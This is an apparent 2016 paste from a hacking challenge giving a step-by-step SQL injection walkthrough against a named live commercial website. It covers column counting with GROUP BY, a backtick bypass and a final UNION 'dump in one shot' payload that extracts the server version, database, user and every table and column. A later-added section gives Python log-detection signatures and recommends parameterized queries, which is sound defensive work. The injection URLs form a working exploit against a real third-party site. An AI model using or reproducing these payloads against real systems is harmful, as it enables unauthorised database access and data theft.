silentangelph

SA - EZ SQLi Challenge Solution (Column Condition Bypass)

Jun 2nd, 2016
SA - EZ SQLi Challenge {SOLUTION}

CHALLENGE:
Site: http://comforthomesolution.com/product.php?c=11
Level: ez as fuck (for real this time HAHAHAHA but kinda tricky hihi)

Tasks:
-Union based only (don't use other fucking methods)
-Print your name, version, db, user, tables and columns

Rules: (not too many for now hihi)
-Thou shall not use version(), @@version in printing the version
-Thou shall not use user(), @@user, current_user in printing the user
-Thou shall not use database() in printing the database
-PM me your query to be in the solvers list

SOLUTION:
First of all, we need to close the query using ")" so that it doesn't affect our query.

We can easily get the number of columns using GROUP BY :)

http://comforthomesolution.com/product.php?c=11)+group+by+1--+ <- no error
http://comforthomesolution.com/product.php?c=11)+group+by+2--+ <- no error
http://comforthomesolution.com/product.php?c=11)+group+by+3--+ <- no error
http://comforthomesolution.com/product.php?c=11)+group+by+4--+ <- no error
http://comforthomesolution.com/product.php?c=11)+group+by+5--+ <- no error
http://comforthomesolution.com/product.php?c=11)+group+by+6--+ <- no error
http://comforthomesolution.com/product.php?c=11)+group+by+7--+ <- no error
http://comforthomesolution.com/product.php?c=11)+group+by+8--+ <- no error
http://comforthomesolution.com/product.php?c=11)+group+by+9--+ <- fuck bro, at last an error!!!

Okay, so now we know there are only 8 columns. So let's try it boiz!

http://comforthomesolution.com/product.php?c=.11)+union+select+1,2,3,4,5,6,7,8--+

Wtf, what happened, why is it like that? Nothing showed up, fuck this shit :( (That's mostly the error you've encountered, right? It's because of the SQL statements inside the site we're injecting into (column condition shits).)

To bypass it and have c_cat.id etc. ignored, we will use the holy backtick "`", or "%60" when it is URL-encoded.

Now let's try it!

http://comforthomesolution.com/product.php?c=.11)+union+select+1,2,3,4,5,6,7,8`--+

Ehmerged, the vuln columns showed up woo!!! We can now DIOS the site, so this will be the final query.

http://comforthomesolution.com/product.php?c=11) union select 1,concat(@@global.version,0x3a3a53696c656e74416e67656c3c62723e44617461626173653a3a,schema(),0x3c62723e557365723a3a,system_user(),concat(@c:=0x00,if((select+count(*)+from+information_schema.columns+where+table_schema=database()+AND+@c:=concat(@c,0x3c62723e,table_name,0x2e,column_name)),0x00,0x00),@c)),3,4,5,6,7,8`

Hope you learned something :))

Btw, I'm planning to create a YouTube channel too in the near future so stay tuned folks!
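
From the defender's side, the requests in this write-up leave a recognisable trail in web server logs. The following is an added example, not part of the original paste, that flags the column-count stepping, the UNION SELECT, the information_schema read and the trailing backtick in URL query strings. The function names, signature names, sample entries and IP addresses are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the request shapes shown in the write-up (names are hypothetical).
SIGNATURES = {
    "column_count_probe": re.compile(r"\b(?:group|order)\s+by\s+(\d+)", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enumeration": re.compile(r"\binformation_schema\b", re.I),
    "trailing_backtick": re.compile(r"`\s*(?:--|#|$)"),
}

def classify(query_string):
    """Return the sorted signature names matching one URL query string."""
    decoded = unquote_plus(query_string)  # '+' -> space, %60 -> backtick
    return sorted(n for n, rx in SIGNATURES.items() if rx.search(decoded))

def probe_runs(entries, min_steps=3):
    """entries: iterable of (client_ip, query_string) in log order.
    Returns {client_ip: highest ordinal} for clients that stepped
    GROUP BY / ORDER BY ordinals upward at least min_steps times."""
    seen = {}
    for ip, qs in entries:
        m = SIGNATURES["column_count_probe"].search(unquote_plus(qs))
        if m:
            seen.setdefault(ip, []).append(int(m.group(1)))
    result = {}
    for ip, ordinals in seen.items():
        steps = sum(1 for a, b in zip(ordinals, ordinals[1:]) if b == a + 1)
        if steps >= min_steps:
            result[ip] = max(ordinals)
    return result

# Constructed sample entries (documentation IP ranges, not real traffic).
SAMPLE = [
    ("198.51.100.7", "c=11)+group+by+1--+"),
    ("198.51.100.7", "c=11)+group+by+2--+"),
    ("198.51.100.7", "c=11)+group+by+3--+"),
    ("198.51.100.7", "c=11)+group+by+4--+"),
    ("198.51.100.7", "c=.11)+union+select+1,2,3,4,5,6,7,8%60--+"),
    ("203.0.113.9", "c=11"),
    ("203.0.113.9", "q=sort+order+by+price"),  # benign: no numeric ordinal
]

if __name__ == "__main__":
    for ip, qs in SAMPLE:
        print(ip, qs, classify(qs))
    print(probe_runs(SAMPLE))
```

Matches like these are a triage signal only; the fix is a parameterized query for the c parameter so that ")" and the backtick arrive as data rather than as SQL.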